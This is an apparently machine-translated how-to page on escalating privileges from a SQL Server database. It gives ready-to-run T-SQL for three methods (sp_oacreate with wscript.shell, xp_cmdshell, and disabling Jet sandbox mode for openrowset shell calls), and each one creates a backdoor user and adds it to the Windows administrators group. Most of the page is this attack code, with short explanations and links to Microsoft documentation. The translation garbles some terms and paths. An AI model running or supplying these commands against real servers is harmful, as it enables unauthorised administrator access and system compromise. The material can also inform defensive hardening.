In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-03-31 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)06/01 Report--
Use sp_oacreate to claim rights
-- lifting statement-- the function of sp_configure is to display or change the global configuration settings of the current server. Successful execution returns 0, and failure returns 1.
EXEC sp_configure 'show advanced options', 1
-- make the previous configuration effective, RECONFIGURE
EXEC sp_configure 'Ole Automation Procedures', 1
RECONFIGURE
Declare @ shell int
-- invoke the wscript.shell component using sp_oacreate to store the returned object in the @ shell variable.
Exec sp_oacreate 'wscript.shell',@shell output
-- use sp_oamethod to call the Run method in the @ shell object to execute the command to add a user. Null is the return value of the run method, so we don't need to use the return value, so write null.
Exec sp_oamethod @ shell,'run',null,'c:\ windows\ system32\ cmd.exe / c net user margin margin / add'
Exec sp_oacreate 'wscript.shell',@shell output
Use sp_oamethod to call the Run method in the @ shell object to execute the command to add a user
Exec sp_oamethod @ shell,'run',null,'c:\ windows\ system32\ cmd.exe / c net localgroup administrators margin / add'
-- restore statement EXEC
Sp_configure 'Ole Automation Procedures', 0
RECONFIGURE
EXEC sp_configure 'show advanced options', 0
RECONFIGURE
The above is the weight lifting statement using sp_oacreate, which is mainly used to call the OLE object (the abbreviation of Object Linking and Embedding, the OLE object in VB) and use the run method of the OLE object to execute system commands. It is clearly stated in the official documentation of oacreate that if you want to use OLE objects, you must open 'Ole Automation Procedures', that is, EXEC sp_configure' Ole Automation Procedures', 1; execute EXEC sp_configure 'show advanced options', 1 before executing this statement; the official interpretation of this sentence is: show advanced options, the "Show Advanced options" option is used to display advanced options for stored procedures on the sp_configure system. When Show Advanced options is set to 1, you can use sp_configure to list advanced options. The default value is 0.
Use xp_cmdshell to claim rights
-- weighting statement
Exec sp_configure 'show advanced options', 1 position reconfigure
Exec sp_configure 'xp_cmdshell',1;reconfigure;-- turn on CMDshell
The full writing of master..xp_cmdshell is master.dbo.xp_cmdshell.
Exec master..xp_cmdshell 'net user margin margin / add'
Exec master..xp_cmdshell 'net localgroup administrators margin / add'
-- restore statement EXEC
Sp_configure 'show advanced options', 0
RECONFIGURE
Use sandboxie to lift the power
-- weighting statement
Exec sp_configure 'show advanced options',1;reconfigure
If it is not enabled, we will be prompted to enable it when we execute xp_regwrite.
Exec sp_configure'Ad Hoc Distributed Queries',1;reconfigure
-- close sandboxie mode. If there is a problem with executing all the code at once, execute the above two sentences of code first.
Exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\ Microsoft\ Jet\ 4.0\ Engines','SandBoxMode','REG_DWORD',0
-- the query is closed normally. After testing, it is found that whether sandboxie mode is on or off will not affect our execution of the following statement.
Exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\ Microsoft\ Jet\ 4.0\ Engines',' SandBoxMode'
-execute the system command select * from openrowset ('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell ("net user margin margin / add")')
Select * from openrowset ('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell ("net localgroup administrators margin / add")')
Sandboxie mode SandBoxMode parameter meaning (default is 2)
`0`: disable enabling security mode in any owner
`1`: only within the allowable range
`2`: must be in access mode
`3`: fully enabled
Openrowset is the SQL Server database that can be accessed through OLE DB, and OLE DB is the driver that the application links to SQL Server.
-- restore configuration
-- exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\ Microsoft\ Jet\ 4.0\ Engines','SandBoxMode','REG_DWORD',1
-- exec sp_configure'Ad Hoc Distributed Queries',0;reconfigure
-- exec sp_configure 'show advanced options',0;reconfigure
SQL Server official reference documentation
Official document of sp_configure: https://docs.microsoft.com/zh-cn/sql/relational-databases/system-stored-procedures/sp-configure-transact-sql?view=sql-server-2017
Official document of sp_oacreate: https://docs.microsoft.com/zh-cn/sql/relational-databases/system-stored-procedures/sp-oacreate-transact-sql?view=sql-server-2017
Official document of sp_oamethod: https://docs.microsoft.com/zh-cn/sql/relational-databases/system-stored-procedures/sp-oamethod-transact-sql?view=sql-server-2017
Official document of openrowset: https://docs.microsoft.com/zh-cn/sql/t-sql/functions/openrowset-transact-sql?view=sql-server-2017
Official document of ole db: https://docs.microsoft.com/zh-cn/sql/connect/oledb/ole-db/oledb-driver-for-sql-server-programming?view=sql-server-2017
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.
12
Report
